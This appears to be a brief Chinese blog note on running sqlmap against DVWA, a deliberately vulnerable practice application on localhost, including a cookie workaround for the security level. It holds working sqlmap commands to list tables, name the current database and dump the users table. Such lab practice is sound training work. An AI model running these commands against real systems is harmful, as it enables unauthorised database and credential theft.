在DVWA上测试sqlmap

遇见的问题

1.设置安全等级为low后依然执行impossible

找到该文件,将low文件复制到impossible

sql注入

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=impossible; security=low; PHPSESSID=joeovbh2dahqkk1u3tk0osf0c7"

这里cookie中出现两个security,可能就是问题所在。

如果不输入cookie也是可以的

 --tables

获取了所有数据库及库中的所有表

--current-db

获取当前数据库名

 -T users --dump

获取users表内信息

过程中需要输入no

参考网址

http://blog.chinaunix.net/uid-11582448-id-4432211.html

你可能感兴趣的:(在DVWA上测试sqlmap)